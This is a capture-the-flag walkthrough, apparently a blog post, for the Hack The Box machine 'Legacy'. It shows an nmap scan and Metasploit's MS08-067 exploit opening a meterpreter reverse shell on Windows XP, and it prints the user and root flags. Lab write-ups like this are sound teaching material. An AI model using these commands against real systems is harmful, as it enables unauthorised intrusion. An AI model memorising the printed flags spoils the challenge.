Legacy is a retired Windows machine that is rated as Easy on Hack the Box.
Let’s get started
As always hacking starts with NMAP scan.
Nmap scan report for 10.10.10.4
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Running (JUST GUESSING): Microsoft Windows 2000|XP|2003|PocketPC/CE (91%)
OS CPE: cpe:/o:microsoft:windows_2000 cpe:/o:microsoft:windows_xp
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: unknown, NetBIOS MAC: 00:50:56:aa:ea:dc (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
| smb-security-mode:
| account_used: blank
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
As we can see that it’s a windows [XP] machine, It can be exploited in many ways. The easy way is to use metasploit and take down the machine.
metasploit
msfconsole
msf5 > search netapi
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms03_049_netapi 2003-11-11 good No MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow
1 exploit/windows/smb/ms06_040_netapi 2006-08-08 good No MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow
2 exploit/windows/smb/ms06_070_wkssvc 2006-11-14 manual No MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow
3 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
msf5 > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 10.10.10.4
rhost => 10.10.10.4
msf5 exploit(windows/smb/ms08_067_netapi) > set lhost tun0
lhost => tun0
msf5 exploit(windows/smb/ms08_067_netapi) > exploit
After the exploit is successfully completed we get the meterpreter shell…
meterpreter > sysinfo
Computer : LEGACY
OS : Windows XP (5.1 Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Domain : HTB
Logged On Users : 1
Meterpreter : x86/windows
Getting User.txt
meterpreter > ls
Listing: C:\Documents and Settings\john\Desktop
===============================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 32 fil 2017-03-16 02:19:32 -0400 user.txt
meterpreter > cat user.txt
e69af0e4f443de7e36876fda4ec7644f
Getting Root.txt
meterpreter > ls
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 32 fil 2017-03-16 02:18:19 -0400 root.txt
meterpreter > cat root.txt
993442d258b0e0ec917cae9e695d5713
Gaining both the flags is just so easy.
If you like my work, please do consider giving me +rep on HACKTHEBOX.
My HackTheBox profile: https://www.hackthebox.eu/home/users/profile/291968
PREVIOUSVulnhub EVM
NEXTHackTheBox Blue